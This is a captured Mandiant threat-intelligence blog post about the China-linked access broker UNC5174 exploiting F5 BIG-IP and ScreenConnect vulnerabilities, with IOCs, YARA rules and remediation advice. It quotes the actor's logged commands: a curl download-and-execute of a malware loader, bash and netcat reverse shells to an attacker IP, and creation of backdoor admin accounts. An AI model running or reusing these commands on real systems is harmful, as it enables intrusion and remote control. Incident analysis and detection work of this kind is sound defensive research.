www.mandiant.com
Open in
urlscan Pro
162.159.240.125
Public Scan
URL:
https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect
Submission: On April 03 via api from IT — Scanned from IT
Submission: On April 03 via api from IT — Scanned from IT
Form analysis
2 forms found in the DOMGET /search
<form action="/search" method="get">
<div class="js-form-item form-item js-form-type-textfield form-item-search js-form-item-search"> <label class="visually-hidden" for="edit-search">Search</label> <input data-drupal-selector="edit-search" type="text" id="edit-search" name="search"
value="" size="30" maxlength="128" class="form-text" placeholder="Search"></div>
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions"> <button data-drupal-selector="edit-submit-acquia-search" type="submit" id="edit-submit-acquia-search"
class="button js-form-submit form-submit"> <span class="visually-hidden">Submit search form</span> <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
<path d="M7.22574 13.9446C10.6622 13.9446 13.4481 11.1588 13.4481 7.72232C13.4481 4.28583 10.6622 1.5 7.22574 1.5C3.78925 1.5 1.00342 4.28583 1.00342 7.72232C1.00342 11.1588 3.78925 13.9446 7.22574 13.9446Z" stroke="currentColor"
stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
<path d="M15.0001 15.4996L11.6167 12.1162" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
</svg> </button></div>
</form>
GET /search
<form action="/search" method="get">
<div class="js-form-item form-item js-form-type-textfield form-item-search js-form-item-search"> <label class="visually-hidden" for="edit-search">Search</label> <input data-drupal-selector="edit-search" type="text" id="edit-search" name="search"
value="" size="30" maxlength="128" class="form-text" placeholder="Search"></div>
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions"> <button data-drupal-selector="edit-submit-acquia-search" type="submit" id="edit-submit-acquia-search"
class="button js-form-submit form-submit"> <span class="visually-hidden">Submit search form</span> <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
<path d="M7.22574 13.9446C10.6622 13.9446 13.4481 11.1588 13.4481 7.72232C13.4481 4.28583 10.6622 1.5 7.22574 1.5C3.78925 1.5 1.00342 4.28583 1.00342 7.72232C1.00342 11.1588 3.78925 13.9446 7.22574 13.9446Z" stroke="currentColor"
stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
<path d="M15.0001 15.4996L11.6167 12.1162" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
</svg> </button></div>
</form>
Text Content
mandiant.com uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more. Hide Skip to main content Mandiant is now part of Google Cloud. Learn More. * Platform * Solutions * Intelligence * Services * Resources * Company MANDIANT ADVANTAGE Explore our multi-vendor XDR platform, delivering Mandiant products and integrating with a range of leading security operations technology. Explore the platformarrow_forward Who's targeting you * Attack Surface Management Map your external environment * Breach Analytics for Chronicle Know what we know when we know it * Security Validation Validate controls are working properly * Threat Intelligence Access latest intel from the frontlines * Digital Threat Monitoring Visibility into deep, dark, and open web * Managed Defense Managed detection and response MANDIANT SOLUTIONS Solve your toughest cyber security challenges with combinations of products and services. * Featured solutionsarrow_forward * By use casearrow_forward * By industryarrow_forward * Featured solutions * Proactive Exposure Management New! Reduce exposures before adversaries act * Government New! Protect national services and agencies * Digital Risk Protection Prioritize and focus on threats that matter * Ransomware Increase resilience against ransomware and multifaceted extortion * Know Who is Targeting You Prioritize threats that matter most * Know What Is Exposed Identify attack surface exposures * Know If You Are Prepared Test and measure your cyber defense program * Know If You Have Been Breached Detect and respond to breach activity quickly and effectively * Use Case * Ransomware Increase resilience against multifaceted extortion * Cyber Risk Management Advance your business approach to cyber security * Digital Risk Protection Prioritize and focus on threats that matter * Industrial Controls Strengthen OT and ICS security * Insider Threats Uncover and manage internal vulnerabilities * Skills Gap Close gaps with training and access to expertise * Private Industry * Finance New! Extend your security posture and operationalize resilience * Manufacturing New! Protect against cyber security threats to maintain business continuity * Government * Election Security Focus on Election Infrastructure Protection * Government New! Protect natural services and agencies MANDIANT SERVICES Mitigate threats, reduce risk, and get back to business with the help of leading experts. Learn morearrow_forward View all services (47)arrow_forward Schedule a consultation * Featured categories * Cyber Security Transformation Establish and activate cyber defenses * Incident Response Tackle breaches confidently * Strategic Readiness Increase resilience to risk * Technical Assurance Test your security program * Expertise On Demand Access to Mandiant Experts * Training * Browse courses Browse on-demand and live training * Mandiant Academy Train your teams to protect effectively CYBER THREAT INTELLIGENCE Mandiant specializes in cyber threat intelligence, offering products, services, and more to support our mission to defend against cyber crime. Intelligence resourcesarrow_forward * Products * Threat Intelligence Access latest intel from the frontlines * Digital Threat Monitoring visibility into deep, dark, and open web * Services * Intelligence capability development build a comprehensive threat intelligence program * Intelligence Training Develop practical application skills * Executive Briefings Get live, interactive briefings from the frontlines * Advanced Intelligence Access Hire a dedicated analyst for your needs RESOURCE CENTER Get the latest insights from cyber security experts at the frontlines of threat intelligence and incident response M-Trends 2023 reportarrow_forward mWISEarrow_forward View all resourcesarrow_forward * Resource types * Mandiant Blog Expert perspectives and industry news * Podcasts Interviews, hot topics, and more * Customer Stories Case studies and customer testimonials * Reports Research from the frontlines * Webinars Livestreams and pre-recorded speaker events * Insights Cyber security concepts, methods, and more * Events Upcoming conferences and collaboration * Infographics Visualization of security research and process * Datasheets Information on Mandiant offerings and more * eBooks High-impact cyber security guides * White Papers Cyber security insights and technical expertise COMPANY Learn more about us and our mission to help organizations defend against cyber crime. Learn morearrow_forward Contact us * Careers Life at Mandiant and open roles * Media Center Press releases and news mentions * Partners Ecosystem and resources * Elevate Empowering women in cyber security * Mandiant Gives Back Our commitment to a better future * Sign in to Advantage en expand_more * English * Français * Deutsch * Italiano * 日本 * 한국어 * Español Get Started Search Submit search form Search Submit search form * Platform * Mandiant Advantage Overview * Security Validation * Attack Surface Management * Threat Intelligence * Digital Threat Monitoring * Managed Defense * Solutions * Proactive Exposure Management * Government * Ransomware * Know Who is Targeting You * Know What Is Exposed * Know If You Are Prepared * Know If You Have Been Breached * Cyber Risk Management * Digital Risk Protection * OT/ICS Security * Insider Threats * Cyber Security Skills Gap * Finance * Manufacturing * Election Security * Intelligence * Intelligence resources * Threat Intelligence * Digital Threat Monitoring * Intelligence Capability Development * Intelligence Training * Executive Briefings * Advanced Intelligence Access * Services * Services Overview * Incident Response * Strategic Readiness * Cyber Security Transformation * Technical Assurance * View all Services (48) * Mandiant Academy * Find a Course * Expertise On Demand * Resources * Resources * Mandiant Blogs * Customer Stories * Webinars * Events * Podcasts * Reports * Insights * Datasheets * Infographics * White Papers * eBooks * Company * About Mandiant * Careers * Media Center * Partners * Elevate * Mandiant Gives Back * Mobile Footer Section * See what’s new at Mandiant * Get started * Incident Response Help * Contact Sales * Support * Blog TOP * Incident Response * Contact sales * Support * Blog * Support * Contact us * report_problemIncident Response Assistance BREADCRUMB 1. Home 2. Resources 3. Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect Blog BRINGING ACCESS BACK — INITIAL ACCESS BROKERS EXPLOIT F5 BIG-IP (CVE-2023-46747) AND SCREENCONNECT Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen Mar 21, 2024 14 min read | Last updated: Mar 22, 2024 Incident Response Threat Intelligence China Vulnerabilities During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174. Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting ConnectWise ScreenConnect vulnerability (CVE-2024-1709) to compromise hundreds of institutions primarily in the U.S. and Canada. TARGETING AND TIMELINE UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024. The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time. * ConnectWise ScreenConnect Vulnerability CVE-2024-1709 * F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747 * Atlassian Confluence CVE-2023-22518 * Linux Kernel Exploit CVE-2022-0185 * Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525 Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets. Figure 1: UNC5174 global targeting map INITIAL DISCLOSURE OF CVE-2023-46747 On Oct. 25, 2023, Praetorian published an advisory and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (CVE-2023-46747) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The advisory detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise. EVIDENCE OF EXPLOITATION Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "/var/log/audit" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries: * /etc/passwd * /etc/shadow * The creation of the user's home directory was also replicated at /home/<username>. Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time. Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 01420002:5: AUDIT - pid=30629 user=root folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 password **** shell bash partition-access add { all-partitions { role admin } } Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c id The "/var/log/restjavad-audit.log" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "f5support3". The following log entries show the f5support3 user executing bash commands. The body of the POST request contains the bash command being executed. Table 2: UNC5174 bash commands with newly created username f5support3 [I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"} [I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"} UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including: * F5support3 * F5_admin * f5_support POST-EXPLOITATION TACTICS BY UNC5174 AFTER SUCCESSFUL ACCOUNT CREATION SNOWLIGHT, GOHEAVY, GOREVERSE, AND SUPERSHELL UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named SNOWLIGHT. The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: 1. Delete any file previously written to /tmp/watchsys. 2. Forcefully kill the process "watchsys" if it is running. 3. Download the file from a remote URL to /tmp/watchsys. 4. Modify the permissions of /tmp/watchsys to allow execution. 5. Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated. 6. Perform a directory listing of the /tmp directory. Table 3: UNC5174 cURL command to download SNOWLIGHT downloader Nov 2 07:29:47 localhost.localdomain notice icrd_child[17602]: 01420002:5: AUDIT - pid=17602 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &;ls -al /tmp/" Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99". Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process. The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance: * Process Name: memfd:a (deleted) * Path: empty (due to the executable being un-backed) * Args: ? * User: root GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443. Table 4: UNC5174 command to download a bash web shell Nov 2 07:16:15 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0>&1 &"| Table 5: UNC5174 command to download a netcat web shell Nov 2 07:30:37 localhost.localdomain notice icrd_child[18778]: 01420002:5: AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "nc 172.104.124[.]74 443 -e /bin/bash &" INTERNAL RECONNAISSANCE Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command. Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionalitycurl -o /tmp/ss hxxp://172[.]104.124.74/App-amd64linux-noupx curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases/download/v1.2.5/App-amd64linux-noupx The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool FSCAN (https://github.com/shadow1ng/fscan). Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances ./ss -i <Internal CIDR block> GOHEAVY TUNNELER: A CLOSER LOOK UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces. This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including: * SLIVER client * FFUFP * SQLMAP * DIRBUSTER * METASPLOIT * AFROG penetration testing tool * NUCLEI vulnerability scanning templates UNC5174 CLOSES THE DOOR BEHIND THEM Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "mitigation.sh". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance: * bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73 * 28/10 14:16:23 deleted user root6 * 28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u * 4/11/2023 03:36:30 /tmp/.del UNC5174 TARGETS SCREENCONNECT VULNERABILITY On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations. Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised. Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting ATTRIBUTION Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions. CHINESE HACKTIVISTS, UNC302, AND UNC5174 LINK TO MSS CONTRACTORS Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments. As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously indicted by the U.S. Department of Justice in 2020. On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a public proof of concept to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group. Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution. OUTLOOK AND IMPLICATIONS UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom. REMEDIATION AND HARDENING Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances: * Restrict access to the F5 TMUI from the internet. * Immediately apply the F5 mitigation script published in [K000137353] to any vulnerable F5 appliances. * Investigate vulnerable F5 appliances for evidence of compromise. In the event of F5 compromise: * Review appliance configurations for unauthorized modifications. * Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts. * Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor. For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller read our latest ScreenConnect remediation and hardening guide. INDICATORS OF COMPROMISE (IOCS) NETWORK IOCS IP Address ASN NetBlock Location 118.140.151[.]242 9304 HGC Global Communications Limited (HK) 61.239.68[.]73 9269 Hong Kong Broadband Network Ltd. (HK) 172.245.68[.]110 36352 Colocrossing (U.S.) URLS URL Description http://172.245.68[.]110:8888 SUPERSHELL C2 HOST IOCS MD5 Hash Filename Type Code family c867881c56698f938b4e8edafe76a09b LG ELF SNOWLIGHT df4603548b10211f0aa77d0e9a172438 N/A ELF SNOWLIGHT 0951109dd1be0d84a33d52c135ba9c97 N/A ELF SNOWLIGHT 9c3bf506dd19c08c0ed3af9c1708a770 memfd:a ELF N/A 0ba435460fb7622344eec28063274b8a undefined ELF SNOWLIGHT a78bf3d16349eba86719539ee8ef562d N/A ELF SNOWLIGHT HOST BASED INDICATORS (COMMANDS) cmd_data=run util bash -c "echo dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= | base64 -d | sh" "tmsh -q -c 'cd /;show running-config recursive'" run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0>&1 &" DETECTIONS rule M_Backdoor_GOREVERSE_2 { meta: author = "Mandiant" description = "This rule is designed to detect events related to goreverse. GOREVERSE is a publicly available reverse shell" md5 = "5c175ea3664279d6c0c2609844de6949" platforms = "Windows,Linux,MacOS" malware_family = "GOREVERSE" strings: $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B [5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B } $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 } $cc_rssh = "rssh" fullword $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 [1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 } $str1 = "--[foreground|fingerprint|proxy|process_name] -d|--destination <server_address>" $str2 = "-d or --destination Server connect back address (can be baked in)" $str3 = "--foreground Causes the client to run without forking to background" $str4 = "--fingerprint Server public key SHA256 hex fingerprint for auth" $str5 = "--proxy Location of HTTP connect proxy to use" $str6 = "--process_name Process name shown in tasklist/process list" condition: ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) and (all of ($str*) or all of ($cc_*)) } rule M_APT_Downloader_SNOWLIGHT_1 { meta: author = "Mandiant" description = "This rule is designed to detect the SNOWLIGHT code family" md5 = "0951109dd1be0d84a33d52c135ba9c97" platforms = "Linux" malware_family = "SNOWLIGHT" strings: $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 7C F2 48 63 D2 48 89 EE 44 89 E7 } $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 00 BF 3F 01 00 00 E8 8C FE FF FF } condition: uint32(0) == 0x464c457f and all of them } MANDIANT SECURITY VALIDATION ACTIONS Organizations can validate their security controls using the following actions with Mandiant Security Validation. Table 4: Mandiant Security Validation Actions VID Name A106-917 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation A106-916 Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication A107-059 Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1 A107-056 Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1 MITRE ATT&CK Mandiant has observed UNC5174 use the following techniques: Initial Access T1190 Exploit Public-Facing Application Defense Evasion T1027 Obfuscated Files or Information T1070.004 File Deletion T1140 Deobfuscate/Decode Files or Information T1222.002 Linux and Mac File and Directory Permissions Modification T1601.001 Patch System Image Discovery T1016 System Network Configuration Discovery T1049 System Network Connections Discovery T1082 System Information Discovery T1083 File and Directory Discovery Command and Control T1095 Non-Application Layer Protocol T1105 Ingress Tool Transfer T1572 Protocol Tunneling T1573.002 Asymmetric Cryptography Execution T1059 Command and Scripting Interpreter T1059.004 Unix Shell Persistence T1136.001 Local Account Impact T1531 Account Access Removal Credential Access T1003.008 /etc/passwd and /etc/shadow Resource Development T1608.003 Install Digital Certificate Mandiant has observed UNC302 use the following techniques: Initial Access T1133 External Remote Services T1189 Drive-by Compromise T1190 Exploit Public-Facing Application Collection T1213 Data from Information Repositories T1560 Archive Collected Data T1560.001 Archive via Utility Persistence T1505.003 Web Shell Defense Evasion T1027 Obfuscated Files or Information T1036 Masquerading T1070.004 File Deletion T1112 Modify Registry T1134 Access Token Manipulation T1497 Virtualization/Sandbox Evasion Impact T1529 System Shutdown/Reboot Execution T1059.003 Windows Command Shell T1059.005 Visual Basic T1203 Exploitation for Client Execution Discovery T1012 Query Registry T1016 System Network Configuration Discovery T1057 Process Discovery T1082 System Information Discovery T1083 File and Directory Discovery T1518 Software Discovery Credential Access T1003 OS Credential Dumping Lateral Movement T1021.001 Remote Desktop Protocol Resource Development T1583.003 Virtual Private Server T1584 Compromise Infrastructure Command and Control T1071.001 Web Protocols T1071.004 DNS T1095 Non-Application Layer Protocol Link to RSS feed PREPARE FOR 2024'S CYBERSECURITY LANDSCAPE. Get the Google Cloud Cybersecurity Forecast 2024 report to explore the latest trends on the horizon. Download now HAVE QUESTIONS? LET'S TALK. Mandiant experts are ready to answer your questions. Contact Us * Follow us * * * * FOOTER * Mandiant Advantage Platform * Platform Overview * Security Validation * Attack Surface Management * Threat Intelligence * Digital Threat Monitoring * Managed Defense * Solutions * Proactive Exposure Management * Ransomware * Industrial Controls & OT * Cyber Risk Management * Digital Risk Protection * Insider Threats * Cyber Security Skills Gap * Election Security * Government Cyber Security * Manufacturing * Cyber Threat Visibility * Attack Surface Visibility * Cyber Preparedness * Detection and Response * Financial Services Cyber Security * Services * Services Overview * Incident Response * Strategic Readiness * Cyber Security Transformation * Technical Assurance * View all Services (48) * Expertise on Demand * Mandiant Academy * Overview * Education Formats * Upcoming Courses * On-Demand Courses * Certifications * ThreatSpace Cyber Range * Free Course Sneak Peaks * Resources * Resource Center * Blog * Podcasts * Customer Stories * Reports * Webinars * Insights * eBooks * Infographics * White Papers * Datasheets * Company * About Us * Careers * Events * Media Center * Partners * Partners Overview * Technology Partners * Cyber Risk Partners * Service Partners * Partner Portal * Connect with Mandiant * Contact Us * Report an Incident * Customer Support * Customer Success * Media Inquiries © Copyright 2024 Mandiant. All rights reserved. BOTTOM * Website Privacy Policy * Terms & Conditions * Compliance * Site Map Manage Cookies